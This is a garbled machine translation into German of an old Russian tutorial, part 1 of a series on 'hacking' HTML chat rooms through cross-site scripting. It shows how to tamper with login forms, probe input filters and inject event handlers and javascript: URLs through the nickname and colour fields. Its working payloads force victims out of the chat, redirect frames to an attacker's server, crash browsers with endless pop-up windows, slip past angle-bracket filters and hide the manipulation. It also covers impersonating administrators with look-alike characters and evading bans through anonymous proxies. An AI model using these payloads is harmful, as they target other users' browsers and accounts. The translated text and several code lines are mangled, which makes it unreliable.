This page has been robot translated, sorry for typos if any. Original content here.

Chat-Hacking Teil 1 (Theorie und Praxis)



  • Teil 1
  • Teil 2


  • Diese Seite ist in keiner Weise ruft nicht für illegale Aktivitäten „krekerstvu“ usw. Das Hauptziel - zu studieren Funktionen von HTML Fehler und mit ihrer Anwendung verbundenen Warnung. Für illegale Nutzung der Informationen an den Autor zur Verfügung gestellt ist nicht verantwortlich. Alle Fehler in den Chat - Räumen wurden Chat Verwaltung vom Autor informiert.
    Alle Beispiele in dem Artikel wurden getestet und arbeiten in MSIE 5.50.4134.0600. Die Effizienz der anderen Versionen kann ich nicht garantieren, aber ich bin sicher , dass fast alle Beispiele wird es funktionieren.

    Glossar

    Brechen durch Nick (Handler ohne die Anführungszeichen)
    Brechen durch Nick (Handler in Anführungszeichen)
    Brechen durch den nick (die Filter nicht quotes / relevante Symbole passieren)
    Brechen durch Farbe (ohne die Anführungszeichen Attribut)
    Brechen durch Farbe (Attribut mit Anführungszeichen)
    Auf dem Zeichen müssen Filter prüfen
    Limiter - Handler
    Gefälschte nicks, nicks leer

    Allgemeine Theorie

    Hier möchte ich auf Hacking Azah Chats konzentrieren. Izvenyayus Voraus fortgeschrittene Leser - sind diese Methoden bekannt und so alt wie die Welt. Wenn Sie genug fortgeschritten sind, können Sie den Fokus für das nächste Kapitel gesetzt.

    Das erste, was ich, dass jeder Chat in ihrem ursprünglichen und einzigartigen beachten will (außer Kopien von publizierten tsgishki natürlich). Da absolut keine universellen Möglichkeiten von Hacking. Praktisch betrachtet jeder Chat-Funktionen werden sollen, und ohne die, stumpfe Vorlagen wird nicht funktionieren.

    Vor allem, was ich meine tatsächlich von HTML-Chat zu brechen? Dies ist keine triviale Überschwemmungen und Angriffe auf IP-Chat. Unter dem Einbruch meinen wir nicht autorisierte Änderungen an dem Chat-HTML-Dokument oder den Zugriff auf versteckte Teile davon (zB Privat), dh eine solche Auswirkung auf den Chat, die für Benutzer nicht vorgesehen und erlaubt war. Es gilt auch nicht nur auf die Chat-Räume, sondern auch auf die Foren, Gäste Bücher usw. (Wo alle beschriebenen Methoden arbeiten, und noch besser, weil diese Formen geschützt sind, ist es in der Regel schlechter als der Chat).

    Alle Beschreibungen gelten nur für HTML-Chats. Hacking Java-Chat-Räume - ein separates und völlig anderes Lied. Ich hoffe, dass Sie in der Lage, eine Art von einem anderen Chat zu unterscheiden :) ).

    So sind wir kurz davor HTML-Chat. Nehmen wir an, dass wir es auf die „Stärke“ testen. Was zuerst zu tun? Zunächst einmal haben wir über einen anonymen Proxy-Verbindung herstellen (Ich hoffe, Sie wissen, was es ist). Es ist aus zwei Gründen notwendig: Erstens, wir anonym liefern (dass der Administrator Onkel schlug auf dem Arsch würde), und zweitens, wenn der Administrator immer noch nicht, wie unsere Versuche, und es wird uns zum Fenster im Chat schließen, könnten wir wechseln ihre Vertretung auf eine andere IP-Adresse und geben Sie dann den Chat. Es ist wahr, es hat eine Sache: der Eingang zu einigen der Chat-Räume nicht über öffentliche Proxies erlaubt.

    Als nächstes müssen wir die eigentliche Waffe, die wir haben, um herauszufinden, was das heißt, welche Attribute den Benutzer angeben kann. In der Regel können alle Chats NICK nick und nick COLOR eingeben. Darüber hinaus ist es manchmal möglich, den SOAP-Benutzer, seine Heimat Webseite, Sex, Chat, Bildwiederholrate einstellen und andere. Im Interesse der Praxis sind solche Felder wie Farbe, Spitznamen, Seife und Homepage des Benutzers. Sie werden direkt in den Körper des Dokuments eingefügt, weil es durch sie in das Chat angreifen kann. Es soll, dass die Zimmer in einigen Chat beachtet werden, zu registrieren, und ein Teil der in der Registrierung angegebenen Attribute, und einige - kurz vor dem Chatraum (oder bereits im Chat) eingeben. Chats mit der Registrierung, in der Regel steiler gehäuft und besser geschützt.

    > Lassen Sie sich nach Möglichkeiten von Hacking. Vor allem auf der Form eines Codefragment in der MDM setzt die Farbe unserer Beiträge fokussiert werden (übrigens Farbe separat angegeben werden kann, sowohl für Nick und für Mitteilungstext - Sie müssen beide überprüfen, da sie anders analysiert werden kann, Chat). Warum sind wir in erster Linie daran interessiert, die Farbe? Denn Farbe ist in dem Tag angegeben, in ihren Einstellungen, im Gegensatz zu zum Beispiel nick, die oft im Body - Tag erscheint. Und in den Chat zu brechen, müssen wir es in den Tag - Parameter zu erhalten , die möglich wäre , die Attribute zu ändern oder ein eigenes Skript ein (manchmal natürlich alle Tags Sie einfach den Nachrichtentext schreiben kann, so bis vor kurzem war es zum Beispiel in einem Chat chat.rambler. ru, aber diese Option ist so dumm , dass solche Chaträume nicht mehr vorhanden sein muss, und ich glaube nicht).

    Wir sind daran interessiert, in welcher Form der Farbinformation an den Server gesendet wird. Die am wenigsten geschützten String-Typ, wenn die Farbe in Form seines Namens übertragen sich. Zum Beispiel:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий value=blue
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный value=black
    <option value=lightblue>голубой value=lightblue
    </select>

    Solche Chat brechen in der Regel in unterschiedlichem Maße nach unten, :) . Mehr als schlimmsten Fall, wenn die Farbe in Form eines Zahlencodes zurückkommt:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий value=#0000FF
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный value=#000000
    <option value=#0000AF>голубой value=#0000AF
    </select>

    In diesem Chat, vielleicht sind die Filter für alle Zeichen außer Ziffern und Zeichen # Buchstaben A, B, C, D, E und F. Dann etwa durch die Farbe brechen wird vergessen haben.

    Schließlich ist der schlimmste Fall, wenn die Farbe nur als Nummer aus der Liste der zulässigen Farben übertragen wird:

    <select name=youcolor style="width:70px">
    <option value=1>синий <
    <option value=2>красный <
    <option value=3>т-красный <
    <option value=4>зеленый <
    <option value=5>черный <
    <option value=6>голубой <
    </select>

    In der Regel ist dies nicht möglich, durch die Hack-Chat Farbe (und oft unmöglich). Dies ist die sicherste Option (übrigens, ich empfehle Entwickler Chats).

    Als nächstes müssen wir den HTML-Code ändern, so dass wir frei auf beliebigen Wert des Attributs eines Servers beziehen. Diese Website auf , um Speicherplatz zu erhalten und das Anmeldeformular im Chat (oder Registrierung) seduyuschim Art und Weise ändern: mich auf der vollständigen Adresse des Adressformular Einstellung Aktion benachrichtigen. Ersetzen Sie alle Arten von versteckten Tags auf der Art des Textes und seine Tags , um den Select - Eingang zu ändern. muß auch Beschränkungen für die Länge des Eingangswertes (falls vorhanden) entfernen. Zum Beispiel, wenn die ursprüngliche Form hat die Form:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Nach entsprechendem Ersatz zu bekommen:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Beachten Sie, dass das Dokument dynamisch vom Typ document.write () Funktion erstellt werden kann, dann höchstwahrscheinlich, Sie haben es zu einer statischen Sicht zu konvertieren. Darüber hinaus kommt es häufig vor, dass nach der HTML-Datei auf der Disc zu speichern, wird der Chat nicht öffnen möge. Dies kann auf die Tatsache zurückzuführen sein, dass die Seite nicht im vollen Umfang erhalten, wenn sie aus dem Rahmen bestehen. In diesem Fall müssen Sie mehr gründlich, um die Seitenstruktur zu verstehen und rechts zu halten. Ein weiterer Grund kann sein , dass der Server den Überblick über die Header - Referer HTTP - Anforderung hält, und lokalisieren , was wir nicht auf seine Seite gehen Sie. In diesem Fall ist es notwendig, andere Methoden anzuwenden, die im Kapitel „Hacking at http“ diskutiert werden.

    Wir experimentieren jetzt mit Chat. Zunächst einmal müssen Sie herausfinden, welche Filter auf den Eingangswerten sind (ein erstes für die Farbe und Spitzname). Wir sind in erster Linie interessieren sich für die folgenden Zeichen:

    " ' ` = < > ; \ & % Lücke

    Geben Sie sie in das Farbfeld und Nick gehen in den Chat-Raum (wenn wir auf solche Attribute erlaubt werden, wenn nicht leer ist, müssen die Zeichen aussortieren eins nach dem anderen), und sehen, welche Charaktere waren übersprungenen Filter (Schreiben im Chat, dass der Thread-Typ „Hallo“, und posmortev in HTML-Textzeichen, die Farben und Spitznamen sind vorhanden). Einige Chats einfach entfernen Sie die gefilterten Symbole, einige mit anderen Zeichen zu ersetzen, und einige in codierter Form wie <oder‘umgewandelt. Solche umgewandelten Zeichen passen uns nicht, weil HTML sie nicht wahrnehmen (aber mehr dazu finden Sie unter „Vor ein paar Hacks Chat T Leiden“).

    Als Ergebnis sollten wir für jedes Attribut des Anmeldeformulars eine Liste der Sprung Zeichen lang sein.

    Weiterhin ist es unser Ziel innerhalb jeden Tages zu bekommen für, dass seine pramatry Ihr Skript dort ändern würde oder einfügen. Es gibt zwei grundsätzlich verschiedene Möglichkeiten , dies zu tun: Die erste ist , dass wir der richtige Code haben wird durch die Attribute übertragen , die bereits innerhalb des Tags sind (dh zwischen den spitzen Klammern) - beispielsweise durch Farbe oder Adresse Seife. Die zweite ist, dass die Struktur des HTML-Code zu brechen, so dass wir der richtige Code war in den Tag haben. So geht aus der Analyse eines konkreten Struktur chatovskogo Code und eine Reihe von ungefilterten Symbolen für unsere Attribute bestimmt wird. Verschiedene Varianten von Hacking, sollten Sie die folgenden Beispiele. In der Zwischenzeit würde Ich mag einige der HTML-Funktionen hervorzuheben, die es wirklich interessant „Effekte“ machen möglich zu produzieren.

    Features HTML

    P> Hier werde ich nicht einen Vortrag über HTML für Dummies geben. Ich hoffe, dass Sie wissen, was ein Tag und seine Parameter sind vertraut mit JavaScript und schrieben mindestens eine Web-Seite in seinem Leben auf HTML (anstelle von Frontpage).

    Die größte Mühe (und mit ihr die Kraft) HTML ist, dass es nicht einen einzigen Standard hat. Das heißt, es ist wie es ist, aber die Standards sind so heterogen, und es gibt so viele in HTML miteinander verflochten, dass niemand es gründlich kennt (und oft nicht weiß, was es ist). Darüber hinaus Wettbewerb zwischen Browsern und Websites Promiskuität führt zu der Tatsache, dass Browser die größtmögliche Anzahl von Standards und Technologie zu halten versuchen. Darüber hinaus hat der Mangel an gemeinsamen Standards führt zu der Tatsache, dass Web-Meister auch auf der gleichen Seite eingestreuten verwaltet in verschiedenen Stilen schreiben :. On (aber das ist, was Hacker in die HTML brechen kann, und eine Menge Kopfschmerzen für Entwickler liefert.

    Eine einfache Frage: Was sind die Trennzeichen in HTML und JavaScript? Auch kann ich nicht sofort und eindeutig zu diesem Thema beantworten. Betrachten Sie folgendes Beispiel:

    <font onclick= "alert()">Text</font>

    Hier ist alles klar und offensichtlich. Es ist ein Tag , das einen Click - Ereignishandler hat, geschrieben in JavaScript, dessen Text in Anführungszeichen gesetzt. Die Tatsache, dass es am besten verwendet JavaScript kann explizit angegeben werden:

    <font onclick="javascript:alert()">Text</font>

    Zeichenfolge mit Trennzeichen in den Beispielen sind doppelte Anführungszeichen. Sie können jedoch ohne sie tun. Denn nach Onclick = kann nur statische Line-Handler, erlaubt HTML Anführungszeichen weglassen (dies gilt für viele Fälle , in denen ein Argument nur einen String-Konstante sein kann). Somit arbeitet dieser Entwurf auch:

    <font onclick=alert()>Text</font>

    und jetzt statt einer leeren Nachricht einfügen etwas Sinnvolles:

    <font onclick=alert('Привет друзья!')>Text</font>

    den Link zu öffnen, ist klarer Beweis, dass dieses Beispiel nicht funktioniert. Der Grund ist folgender: die körpereigenen Handler können nicht in Anführungszeichen gesetzt werden, aber in diesem Fall ist der erste Spalt als einen String-End-Prozessor sein (auch wenn die Lücke innerhalb der Anführungszeichen ist). So denkt der Browser - Handler nur ein Fragment von alert ( ‚Hallo, und ungedecktem Zitat zu finden gibt eine Fehlermeldung Warum Browser auf die Tatsache reagiert nicht , dass die Lücke innerhalb der Anführungszeichen ist , ich denke , der Grund ist , dass es zwei Sprachen gemischt.? HTML und JavaScript. Browser „sah“ , dass nach dem Zeichen = nicht zitiert und damit begann Suche nach einem Raum - .. als das Ende der Prozedur innerhalb des Handlers , wie es im Moment nicht interessiert, weil es nicht auf die HTML bezieht, und JavaScript so öffnet Zitat er einfach nicht bemerkt und ich nahm einen Platz für Pferd . Q-Parameter-Wert neben Bauarbeiten ohne Fehler:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Beachten Sie ein wichtiges Merkmal, wenn der Tag-Parameterwert angegeben wird, kann der Raum vor dem nächsten Parameter weggelassen wird (Drittes Beispiel Linie). Beispiel arbeitet auch die vierte Zeile (in dem Sinne , dass der Browser schwört nicht, aber das Skript sicherlich nicht funktioniert), da der Browser betrachtet nicht den Inhalt der Attributs Farbe JavaScript-Ohm, und daher nicht auf dem freiliegenden Zitat nicht schwören, obwohl als ein Farbwert ist nur ein Fragment von alert genommen ( ' Hallo (als eine Farbe in HTML kann eine zufällige Zeichenfolge sein, in diesem Fall wandelt der Browser den String in einen bestimmten numerischen Wert, und ist der Ansicht , dass die Farbe).

    Gibt es noch andere Zeichen - der Handler stoppt ohne die Anführungszeichen (außer Raum und Charakter>) - eine offene Frage. Ich weiß nicht, aber ich gebe zu, dass sie sein können.

    Wie bereits aus den obigen Beispielen ersichtlich ist, können Begrenzer Linien doppelte oder einfache Anführungszeichen sein. Dies gilt gleichermaßen für HTML, so und JavaScript, aber es ist zumindest ein Zeichen, dass die Grenze der Zeilen in der HTML (aber nicht JavaScript!). Es `Backquote ( in der Regel auf der gleichen Taste mit dem Buchstaben E befindet). Es kann im folgenden Beispiel zu sehen:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    Ich schwöre, dass mindestens 90% der Webmaster darüber nicht wissen! Wie auch immer, ich habe nicht gesehen, dass jemand jemals die Graviszeichen verwendet. Dieser Charakter - ein Geschenk des Himmels für einen Hacker :) ).

    Oft kommt es vor, dass Sie Anführungszeichen innerhalb des einen verwenden müssen - das andere. Und es ist schwierig, vor allem, wenn der Chat geht nur eine Art von Anführungszeichen. Aber es stellt sich JavaScript können Sie String-Konstanten in anderen String-Konstanten einbetten, und zugleich mit ein und den gleichen, die mi-Angeboten! Zum Beispiel:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    Das Beispiel verwendet verschachtelte einfache Anführungszeichen, aber keine Fehler Interpreter produzieren. Ich nehme zur Kenntnis , dass der Inhalt der inneren Anführungszeichen ist nicht willkürlich: es keine Leerzeichen enthalten muß, und am Ende werden einige Zeichen nicht erlaubt, zum Beispiel; oder).

    Nun lassen Sie uns über Links reden. Das erste, was das folgende Detail zu beachten: Entwicklung des Internets geschehen, so dass es ganz andere Technologie vermischen. Zugriff auf die Informationen kann durch eine große Anzahl von unterschiedlichen Protokollen auftreten. Daher erlaubt jede der bekannten Protokolle Browser angeben, wenn Sie den vollständigen Pfad des Dokuments (URL) angeben. Es ist bemerkenswert, dass Javascript auch die Protokolle zugeschrieben wird (obwohl das nicht der Fall, aber anscheinend die Entwickler meinten, sie wären zu fett sein, das Konzept der getrennten Skripte zu markieren, und ordnen sie in den Minuten). Deshalb, egal wo im HTML - Dokument, können Sie eine URL angeben können, können Sie das Skript einfügen. Und dieses Skript wird, sobald der Benutzer ausgeführt (oder der Browser selbst) den angegebenen Link anfordern. Zum Beispiel:

    <a href=javascript:alert()>Text</a>

    Es ist interessant , dass zusätzlich zu den Betreibern, in Bezug auf die JavaScript, geben Sie einfach die Zeichenfolge angeben können (oder numerischen) Wert (aber immer nach den Betreibern, falls vorhanden). Mit einem Klick auf den Browser auf diesen Link wird führen Sie zuerst vor den Betreibern zu erreichen, und dann ein neues Dokument öffnen , und setzen Sie den Wert des letztgenannten in der Referenzlinie:

    <a href=javascript:alert();'Hello!!'>Text</a> Ich nehme zur Kenntnis , dass die Tags so eine neue Seite einfügen , ist unmöglich.

    Hacking-Chat R

    Hier ist ein Beispiel für eine der ersten Gespräche, die ich kompromittiert. Dieser Chat war sehr einfach, und hackt in das, was der erste Ansatz genannt wird, :) ).

    Und jetzt gibt es nur wenige Gespräche, in denen sie stattfindet. Obwohl ich mich diese Methoden gedacht, aber dann fand ich sie in Hacker-Zeitschriften.

    Eingabeformular dieser Chat ist genau im Einklang mit der Form in dem „General Theory“ dargelegt. Nach der Konvertierung und das Formular auf der Festplatte speichern, überprüfte ich heraus, welche Zeichen in der Farbe Attribute ist. Es stellte sich heraus, dass diese Symbole sind (einer von denen, die wir interessiert sind, finden Sie in Kapitel „Allgemeine Theorie“.):

    ' ` = ; % Lücke

    Und natürlich waren alle Zahlen und Buchstaben. Die Länge der Zeichenfolge-Werte der Farben sind nicht darauf beschränkt. Als nächstes ich sah, wo es in der Farbe des Nachrichtenrahmens eingefügt wird. Hier ist ein Fragment des Rahmens:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    Wie Sie sehen können, ist die Farbe, ohne die umgebenden Anführungszeichen eingefügt. Es ist in Ordnung mit mir. Ich loggte nick Shram (oder fast unter diesem Namen;)) und rot size = 20 Farbe. Meine Botschaft war wie folgt:

    <font color=red size=20><b>Algol</b>- Hi</font>

    Diese Schlussfolgerung ist sehr große Schrift, die ein paar Leute überrascht Chat :) ).

    Somit ist trotz der Tatsache , dass wir nicht neposredstveno Tags einfügen können, aber die Erlaubnis , einen Raum in dem Attribut der Farbe zu geben, ermöglicht es uns , die Parameter von nicht autorisierten Tag zu definieren. Aber ich bin sicher, dass dies nicht genug war. Ändern der Schriftgröße natürlich cool, aber wirklich etwas Nützliches kann nur mithilfe von Skripts erfolgen. Fügen Sie den Skript - Tag selbst, ich konnte es nicht (oder besser gesagt, zu der Zeit wusste ich nicht, wie es zu tun). Aber ich konnte einen Handler für jeden Event - Tag fragt. Das ist, was ich für die Farbe gefragt, die aus dem Chat, was irgendeinen Idioten entfernen würde:
    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. Und dann schickte ich ihm eine lange lange Nachricht in privat. Beiträge Farbe nahm ich so hoch, dass sie nicht von der Hintergrundfarbe unterscheiden würden. Eine Schriftgröße und die Länge der Nachrichten waren so groß , dass das Opfer ging wahrscheinlich einmal nach der Maus, was in meinem Handler Onmouseover die Taste gedrückt anstelle des Benutzers „ in den Chat zu verlassen“ :) ).

    Doch nach und nach gab es Experten, die durch einen Trick sah und absichtlich fuhr über ein Chat-Fenster. Mein Skript funktioniert nicht immer :( (. Zuerst dachte ich, es keine Möglichkeit gab. Weil ich nur als Event-Handler die Skript einbetten kann, dann, wenn das Ereignis nicht auftritt, und das Skript nicht funktioniert. Aber das Graben in dem „Annals“, fand ich die Lösung (derzeit ist es trivial worden und weithin bekannt). es stellte sich heraus , dass der Stil - Attribut können Sie die URL des Hintergrundbildes für das Tag enthalten. und wo Sie eine URL angeben kann, können Sie das Skript geschrieben werden. und die Hauptsache ist , dass das Hintergrundbild geladen selbst, am Ende des Download - HTML - Dokument! Wenn ich wollte zeigen Sie Alert-Chatter, melde ich mich auf die nächste Spalte Babe:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    Es sollte ein wichtiges Detail zu beachten: die Struktur des meisten HTML-Chat ist, dass die Seite regelmäßig aktualisiert wird, so dass das Skript mehr ausgeführt wird, als einmal gesendet, aber viele, bis unsere Botschaft nicht vom Bildschirm verschwinden.

    Aber wie es jetzt den Farbattributwert für Dumping aus dem Chat betrachtet wird:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    Es muss daran erinnert werden: das Skript an privaten gesendet, sieht nicht nur die „Quelle“, aber Sie tun, so sollten Sie wissen, wie sie sich von den Auswirkungen des Skripts zu schützen. Dies kann auf zwei Arten erfolgen: entweder sie zu setzen, zu ignorieren (und dann werden wir nicht in ihre eigenen Beiträge sehen) oder Browser-Einstellungen die Anzeige der Bilder zu unterdrücken. Dann wird das Skript von einem Hintergrundbild ausgelöst wird nicht funktionieren.

    Jetzt möchte ich nekotrye nützliche Skripte zeigen, die in geknackt Chats verwendet werden können:

    JavaScript: Ebene ( 'http://myserver.ru') ; - Belastungen im aktuellen Frame (oder Seite) Seite myserver.ru.
    Einige Chat - Räume, mit einem Fragment http: // finden Sie diesen Link, und automatisch <a> Tag eingefügt. Denn es wird unser Skript zerstört, kann dies nicht toleriert werden. Um dies zu tun, lassen Sie einfach das Präfix http: (welche bereits die Standardeinstellung). Dann wird das Skript wie folgt aussehen: javascript: navigieren ( '// myserver.ru' ); .Dva geht voran Slash - erforderlich ist.

    javascript: parent.frames [2] .document.location = 'http: //myserver.ru' - Lasten in einem der Frames Website myserver.ru.

    javascript: for (;;) open ( ) - eine unendliche Anzahl von Fenstern öffnet sich (wenn Sie nicht rechtzeitig orientieren, führt zu einem Absturz und dann den Rechner neu starten).

    javascript: document.write ( '<script> alert () </ script>') - ersetzt den aktuellen Rahmen des Skripts, die dann ausgeführt wird. Hinweis: Wenn Sie das Chutney überspringen Zeichen <und> (was die überwiegende Anzahl des Chats ist) ist ein Skript, das wir nicht einfügen können. Aber es gibt einen Ausweg. Diese Anwendung unescape () Funktion, die den ASCII-Zeichencode in dem Zeichen umwandelt. Ersetzen die spitzen Klammern in der unescape () -Funktion und einem entsprechenden Code, dann das Skript wird:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) 3C') + 'script' + unescape ( '% 3E') + 'alert ()' + unescape ( '% 3C') + '/ script' + unescape ( ‚% 3E javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - fügt das Bild nach dem Text. Beachten Sie, dass in IE 5.x Sie einen beliebigen Tag einfügen können außer für FRAME, IFRAME und SELECT.

    Aber in IE 4.x create () Funktion ermöglicht das Einfügen von nur die Tag IMG, Fläche und OPTION. Informationen über Netscape nicht haben, Sie selbst experimentieren können. 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' event.returnValue = alert (st) * 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' / * blockieren das Pull-Down - Menü auf der Seite, und deshalb tut nicht zur Verfügung Ansicht von HTML - Inhalt in dem Rahmen. Dies ermöglicht es, die Manipulation des Körpers des Chats zu verbergen :) ). * / Manchmal ist es nützlich Protokolle unter einem anderen Spitznamen. Chats mit Registrierungssystem Benutzer werden nicht zulassen, dass Sie dies tun, wenn Sie das Passwort nicht kennen (und Sie haben wahrscheinlich nie wissen,). Banal out: Anmeldung mit dem Spitznamen, wo das lateinische Alphabet ein sehr ähnliches Schreiben russisches Layout zamenyatesya. Zum Beispiel Logins unter dem Namen Admin wo lateinische Buchstaben und auch durch russische ersetzt. primitive Methode, aber es funktioniert)). Es gibt mehr schwere Fälle. Zum Beispiel wird in einigen Chat-Räumen verboten einen Spitznamen Zeichen aus verschiedenen Layouts zu verwenden. Dann forschenden Geist wird nichts anderes übrig, als um Hilfe zu Onkel Tore zu machen. Und hier ist es die menschliche Güte, hat Microsoft nicht über die bösen Benutzer vergessen und gab uns ein Symbol ­ (Aka ­ aka% AD), die sich "weicher Bindestrich" ( "Short Bindestrich") genannt Microsoft. Es sieht wirklich wie in Word Bindestrichen und in Excel, auch, und sogar in einem Notebook, aber nicht in IE! Für maykrosoftovskih eskplorera Symbol ­ einfach nicht vorhanden ist , das heißt, er es zu sein scheint, aber er vergaß eine grafische Darstellung zu machen. Er hat nur einfach nicht in der HTML-Seite gezogen! So Hinzufügen eines kurzen Strich zu jedem nick und wenn sie bei ihm anmelden, erhalten wir in einen Chat mit dem Spitznamen, ohne Bindestrich wie ein Spitzname in der HTML-Seite angezeigt. Und Sie können noch mehr abrupt - Login unter dem Namen, nur die Zeichen sotoyaschim kurze Striche. Dann werden alle Ihre Spitznamen nicht im Chat erscheinen, absolut leerer Raum)).

    (Hinweis: Tinker Yeshe Bit-Symbol kurze Striche, fand ich immer noch Fälle, in denen es angezeigt wird: Es erscheint nur als Bindestrich Das heißt, wenn innerhalb eines Wortes wert ist ein kurzer Strich, und wenn das Wort am Ende einer Zeile steht, Teil eines Wortes nach dem Bindestrich kann. übertragen wird, um die nächste Zeile und der Bindestrich sichtbar ist, ist es möglich, unsichtbar Bindestrich - eine bewusste Funktion von Microsoft (die übrigens ihre Nützlichkeit im Fall nicht von Einbruch vermindern :) ). Die Wahrheit ist nicht klar, warum er noch immer in anderen Anwendungen sichtbar bleibt?)



    Weitere 2 h. >>